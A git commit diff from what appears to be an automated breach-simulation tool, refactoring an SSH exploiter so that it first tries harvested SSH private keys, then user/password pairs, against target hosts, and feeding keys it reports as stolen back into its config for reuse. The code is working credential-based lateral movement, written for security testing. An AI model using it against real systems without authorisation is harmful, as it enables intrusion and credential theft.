Notes fixed

This commit is contained in:
Vakaris 2018-06-04 12:07:10 +03:00
parent 30a3bbf9a0
commit 0503f90168
4 changed files with 35 additions and 21 deletions

View File

@ -32,21 +32,7 @@ class SSHExploiter(HostExploiter):
LOG.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total) LOG.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total)
self._update_timestamp = time.time() self._update_timestamp = time.time()
def exploit_host(self): def exploit_with_ssh_keys(self, port, ssh):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
port = SSH_PORT
# if ssh banner found on different port, use that port.
for servkey, servdata in self.host.services.items():
if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
port = int(servkey.replace('tcp-', ''))
is_open, _ = check_tcp_port(self.host.ip_addr, port)
if not is_open:
LOG.info("SSH port is closed on %r, skipping", self.host)
return False
user_ssh_key_pairs = self._config.get_exploit_user_ssh_key_pairs() user_ssh_key_pairs = self._config.get_exploit_user_ssh_key_pairs()
exploited = False exploited = False
@ -67,8 +53,8 @@ class SSHExploiter(HostExploiter):
timeout=None) timeout=None)
LOG.debug("Successfully logged in %s using %s users private key", LOG.debug("Successfully logged in %s using %s users private key",
self.host, ssh_string) self.host, ssh_string)
self.report_login_attempt(True, user, ssh_key=ssh_string)
exploited = True exploited = True
self.report_login_attempt(True, user, ssh_key=ssh_string)
break break
except Exception as exc: except Exception as exc:
LOG.debug("Error logging into victim %r with %s" LOG.debug("Error logging into victim %r with %s"
@ -76,9 +62,13 @@ class SSHExploiter(HostExploiter):
ssh_string) ssh_string)
self.report_login_attempt(False, user, ssh_key=ssh_string) self.report_login_attempt(False, user, ssh_key=ssh_string)
continue continue
return exploited
def exploit_with_login_creds(self, port, ssh):
user_password_pairs = self._config.get_exploit_user_password_pairs() user_password_pairs = self._config.get_exploit_user_password_pairs()
exploited = False
for user, curpass in user_password_pairs: for user, curpass in user_password_pairs:
try: try:
ssh.connect(self.host.ip_addr, ssh.connect(self.host.ip_addr,
@ -89,8 +79,8 @@ class SSHExploiter(HostExploiter):
LOG.debug("Successfully logged in %r using SSH (%s : %s)", LOG.debug("Successfully logged in %r using SSH (%s : %s)",
self.host, user, curpass) self.host, user, curpass)
self.report_login_attempt(True, user, curpass)
exploited = True exploited = True
self.report_login_attempt(True, user, curpass)
break break
except Exception as exc: except Exception as exc:
@ -99,6 +89,27 @@ class SSHExploiter(HostExploiter):
user, curpass, exc) user, curpass, exc)
self.report_login_attempt(False, user, curpass) self.report_login_attempt(False, user, curpass)
continue continue
return exploited
def exploit_host(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
port = SSH_PORT
# if ssh banner found on different port, use that port.
for servkey, servdata in self.host.services.items():
if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
port = int(servkey.replace('tcp-', ''))
is_open, _ = check_tcp_port(self.host.ip_addr, port)
if not is_open:
LOG.info("SSH port is closed on %r, skipping", self.host)
return False
#Check for possible ssh exploits
exploited = self.exploit_with_ssh_keys(port, ssh)
if not exploited:
exploited = self.exploit_with_login_creds(port, ssh)
if not exploited: if not exploited:
LOG.debug("Exploiter SSHExploiter is giving up...") LOG.debug("Exploiter SSHExploiter is giving up...")

View File

@ -171,6 +171,7 @@ class Telemetry(flask_restful.Resource):
ssh_info = telemetry_json['data']['ssh_info'] ssh_info = telemetry_json['data']['ssh_info']
Telemetry.encrypt_system_info_ssh_keys(ssh_info) Telemetry.encrypt_system_info_ssh_keys(ssh_info)
if telemetry_json['data']['network_info']['networks']: if telemetry_json['data']['network_info']['networks']:
# We use user_name@machine_ip as the name of the ssh key stolen, thats why we need ip from telemetry
Telemetry.add_ip_to_ssh_keys(telemetry_json['data']['network_info']['networks'][0], ssh_info) Telemetry.add_ip_to_ssh_keys(telemetry_json['data']['network_info']['networks'][0], ssh_info)
Telemetry.add_system_info_ssh_keys_to_config(ssh_info) Telemetry.add_system_info_ssh_keys_to_config(ssh_info)
if 'credentials' in telemetry_json['data']: if 'credentials' in telemetry_json['data']:

View File

@ -510,6 +510,9 @@ SCHEMA = {
"type": "array", "type": "array",
"uniqueItems": True, "uniqueItems": True,
"default": [], "default": [],
"items": {
"type": "string"
},
"description": "List of SSH key pairs to use, when trying to ssh into servers" "description": "List of SSH key pairs to use, when trying to ssh into servers"
} }
} }
@ -898,9 +901,8 @@ class ConfigService:
@staticmethod @staticmethod
def ssh_add_keys(public_key, private_key, user, ip): def ssh_add_keys(public_key, private_key, user, ip):
if not ConfigService.ssh_key_exists(ConfigService.get_config_value(['internal'], False, False) if not ConfigService.ssh_key_exists(ConfigService.get_config_value(['internal', 'exploits', 'exploit_ssh_keys'],
['exploits']['exploit_ssh_keys'], False, False), user, ip):
user, ip):
ConfigService.add_item_to_config_set('internal.exploits.exploit_ssh_keys', ConfigService.add_item_to_config_set('internal.exploits.exploit_ssh_keys',
{"public_key": public_key, "private_key": private_key, {"public_key": public_key, "private_key": private_key,
"user": user, "ip": ip}) "user": user, "ip": ip})

View File

@ -404,7 +404,7 @@ class ReportService:
elif issue['type'] == 'ssh_key': elif issue['type'] == 'ssh_key':
issues_byte_array[ReportService.ISSUES_DICT.STOLEN_SSH_KEYS.value] = True issues_byte_array[ReportService.ISSUES_DICT.STOLEN_SSH_KEYS.value] = True
elif issue['type'].endswith('_password') and issue['password'] in config_passwords and \ elif issue['type'].endswith('_password') and issue['password'] in config_passwords and \
issue['username'] in config_users: issue['username'] in config_users or issue['type'] == 'ssh':
issues_byte_array[ReportService.ISSUES_DICT.WEAK_PASSWORD.value] = True issues_byte_array[ReportService.ISSUES_DICT.WEAK_PASSWORD.value] = True
elif issue['type'].endswith('_pth') or issue['type'].endswith('_password'): elif issue['type'].endswith('_pth') or issue['type'].endswith('_password'):
issues_byte_array[ReportService.ISSUES_DICT.STOLEN_CREDS.value] = True issues_byte_array[ReportService.ISSUES_DICT.STOLEN_CREDS.value] = True